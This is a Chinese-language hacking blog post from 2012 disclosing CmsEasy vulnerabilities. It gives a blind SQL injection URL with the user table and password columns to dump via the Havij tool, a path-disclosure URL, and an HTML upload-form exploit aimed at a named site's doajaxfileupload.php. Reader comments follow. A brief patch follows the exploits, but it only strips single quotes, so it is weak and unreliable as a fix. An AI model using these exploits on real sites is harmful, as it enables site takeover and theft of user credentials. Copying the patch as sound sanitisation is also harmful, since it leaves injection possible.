cmseasy(易通CMS)注入漏洞上传漏洞爆路径ODAY

作者:hack1990 时间:12-10-08 阅读数:1372人阅读

注入漏洞
 
注入点:/celive/js/include.php?cmseasylive=1111&departmentid=0

类型:mysql blind—string

错误关键字:online.gif

表名:cmseasy_user

列明:userid,username,password

直接放Havij里面跑。错误关键字:online.gif 添加表名:cmseasy_user 列表:userid,username,password 关键字:Powered by CmsEasy
 
 
 
暴路径ODAY
 
直接把爆路径 如:http://www.iick.blog/index.php?case=archive
 
上传漏洞
 
Exp:
 
<form enctype=”multipart/form-data” method=”post” action=”http://www.iick.blog/celive/live/doajaxfileupload.php”>
<input type=”file” name=”fileToUpload”>
<input type=”submit”value=”上传”>
</form>
 
注入漏洞修复:
 
打开/celive/js/include.php 文件,来到52行或此功能代码处
 
if (isset($_GET['departmentid'])) {
$departmentid = $_GET['departmentid'];
$activity_sql = “SELECT `id` FROM `”.$config['prefix'].”activity` WHERE `departmentid`=’”.$departmentid.”‘ AND `operatorid`=’”.$operatorid.”‘”;
将代码改为
if (isset($_GET['departmentid'])) {
$departmentid = str_replace(“‘”,”",$_GET['departmentid']);
$activity_sql = “SELECT `id` FROM `”.$config['prefix'].”activity` WHERE `departmentid`=’”.$departmentid.”‘ AND `operatorid`=’”.$operatorid.”‘”

评论列表

  •  
    发布于 2012-10-09 13:10:01  回复
  • 学习了
  •  
    发布于 2012-10-09 16:08:37  回复
  • 企业建站系统我想说几点,本人是代理他们的系统! 1.他们的模板是免费使用的。 2.但是你要改模板是单收费的,不管你改什么问题,...
  •  
    发布于 2012-10-15 00:06:58  回复
  • 楼主怎么久没更新了哎 快快

发表评论